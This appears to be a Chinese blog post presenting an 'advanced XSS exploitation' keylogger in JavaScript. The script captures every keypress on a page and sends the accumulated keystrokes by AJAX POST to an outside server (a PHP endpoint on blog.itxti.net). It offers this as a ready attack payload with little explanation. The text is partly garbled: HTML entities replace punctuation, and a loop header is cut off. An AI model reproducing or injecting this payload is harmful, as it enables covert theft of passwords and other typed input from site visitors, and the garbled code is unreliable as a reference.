xss高级利用键盘记录

为什么80%的码农都做不了架构师&＃xff1f;>>>

//创建ajax对象 function createAjax(){ var request&＃61;false;//window对象中有XMLHttpRequest存在就是非IE&＃xff0c;包括&＃xff08;IE7&＃xff0c;IE8&＃xff09; if(window.XMLHttpRequest){ request&＃61;new XMLHttpRequest();if(request.overrideMimeType){ request.overrideMimeType("text/xml"); } //window对象中有ActiveXObject属性存在就是IE }else if(window.ActiveXObject){var versions&＃61;[&＃39;Microsoft.XMLHTTP&＃39;, &＃39;MSXML.XMLHTTP&＃39;, &＃39;Msxml2.XMLHTTP.7.0&＃39;,&＃39;Msxml2.XMLHTTP.6.0&＃39;,&＃39;Msxml2.XMLHTTP.5.0&＃39;, &＃39;Msxml2.XMLHTTP.4.0&＃39;, &＃39;MSXML2.XMLHTTP.3.0&＃39;, &＃39;MSXML2.XMLHTTP&＃39;];for(var i&＃61;0; itry{ request&＃61;new ActiveXObject(versions[i]);if(request){ return request; } }catch(e){ request&＃61;false; } } } return request; } //注意&＃xff1a; 要每次请求都要使用一个新的XMLHttpRequest /* 如果使用get将数据传给服务器&＃xff0c;则服务器就使用$_GET 就直接通过Url将数据传给服务器使用POST时一定要使用 ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");*/ var ajax&＃61;null; var xl&＃61;"username&＃61;"; //这里呢获取键盘 function onkeypress() {var realkey &＃61; String.fromCharCode(event.keyCode); xl&＃43;&＃61;realkey; //自动累加获取键盘 show();//调用下面的函数 } //调用这个函数还有这个脚本是用onkeypress 方法获取的比onup那些都要得多不过不支持特殊字符例如退格 document.onkeypress &＃61; onkeypress; function show(){ajax&＃61;createAjax(); //每当状态改变时激发此方法 ajax.onreadystatechange&＃61;function(){if(ajax.readyState&＃61;&＃61;4){ if(ajax.status&＃61;&＃61;200){ //此处为服务端已经做好了响应 var data&＃61;ajax.responseText;//alert(data);}else{ alert("页面请求失败"); } } }var postdate &＃61; xl;//获取过来的数据 ajax.open("POST", "http://blog.itxti.net/tools/wtitxt.php", true);//然后发送提交到post页面 ajax.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); ajax.setRequestHeader("Content-length", postdate.length); ajax.setRequestHeader("Connection", "close"); ajax.send(postdate);//ajax.send(null);